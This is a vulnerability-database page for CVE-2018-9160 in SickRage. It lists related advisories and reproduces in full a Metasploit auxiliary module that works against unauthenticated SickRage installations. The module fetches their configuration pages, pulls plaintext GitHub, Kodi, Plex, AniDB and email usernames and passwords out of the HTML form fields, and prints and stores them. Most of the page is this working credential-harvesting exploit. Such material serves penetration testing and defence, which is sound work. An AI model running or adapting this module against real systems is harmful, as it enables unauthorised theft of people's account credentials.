HTTP SickRage Password Leak v2018-09-03 allows attacker to view user's saved Github credentials in HTTP responses without login requiremen
Reporter | Title | Published | Views | Family All 11 |
---|---|---|---|---|
![]() | Hardcoded credentials | 31 Mar 201821:29 | – | prion |
![]() | SickRage < v2018.03.09 - Clear-Text Credentials HTTP Response | 26 Apr 201800:00 | – | exploitdb |
![]() | SiCKRAGE Discloses Plaintext Credentials | 13 May 202201:53 | – | github |
![]() | SickRage < v2018.03.09 - Clear-Text Credentials HTTP Response Exploit | 26 Apr 201800:00 | – | zdt |
![]() | SiCKRAGE Discloses Plaintext Credentials | 13 May 202201:53 | – | osv |
![]() | SickRage Credential Disclosure | 26 Apr 201800:00 | – | packetstorm |
![]() | CVE-2018-9160 | 31 Mar 201821:00 | – | cvelist |
![]() | SickRage v2018.03.09 - Clear-Text Credentials HTTP Response | 26 Apr 201800:00 | – | exploitpack |
![]() | HTTP SickRage Password Leak | 22 Jun 201816:18 | – | metasploit |
![]() | CVE-2018-9160 | 31 Mar 201821:29 | – | nvd |
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'HTTP SickRage Password Leak',
'Description' => %q{
SickRage < v2018-09-03 allows an attacker to view a user's saved Github credentials in HTTP
responses unless the user has set login information for SickRage.
By default, SickRage does not require login information for the installation.
},
'Author' =>
[
'Sven Fassbender', # EDB POC
'Shelby Pace' # Metasploit Module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2018-9160'],
['EDB', '44545']
],
'DisclosureDate' => '2018-03-08'
))
register_options(
[
OptString.new('TARGETURI', [true, 'Optional path that gets prepended to the default paths to be searched', '/']),
Opt::RPORT(8081)
])
end
def get_config(path)
uri = normalize_uri(target_uri.path, path)
res = send_request_cgi(
'method' => 'GET',
'uri' => uri
)
# Improve this later: Add a loginscanner.
if res && res.headers['Location'] =~ /^\/login\//
raise RuntimeError, 'SickRage is protected with authentication'
end
unless res && res.code == 200
print_error("Unable to reach #{uri}")
return
end
res.get_html_document
end
def is_valid?(user, pass)
!(user.empty? || ['None', 'hidden_value'].include?(pass))
end
def save_creds(app, user, pass)
print_good("#{app} username: #{user}")
print_good("#{app} password: #{pass}")
store_valid_credential(user: user, private: pass)
end
def get_creds(path, config)
return if config.at("input[@id=\"#{path}_username\"]").nil?
username = config.at("input[@id=\"#{path}_username\"]").attribute('value').to_s
password = config.at("input[@id=\"#{path}_password\"]").attribute('value').to_s
if is_valid?(username, password)
save_creds(path, username, password)
end
end
def get_notification_creds(config)
return if config.at('input[@id="email_host"]').nil?
hostname = config.at('input[@id="email_host"]').attribute('value').to_s
email_user = config.at('input[@id="email_user"]').attribute('value').to_s
email_pass = config.at('input[@id="email_password"]').attribute('value').to_s
if is_valid?(email_user, email_pass)
save_creds("Email", "#{email_user}@#{hostname}", email_pass)
end
end
def run
begin
paths = ['/config/general/', '/config/anime/', '/config/notifications/']
paths.each do |path|
config = get_config(path)
next if config.nil?
if path.split('/').last.eql?('notifications')
get_notification_creds(config)
end
['git', 'anidb', 'kodi', 'plex_server', 'plex_client'].each do |path|
get_creds(path, config)
end
end
rescue RuntimeError => e
print_error(e.message)
end
end
end
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo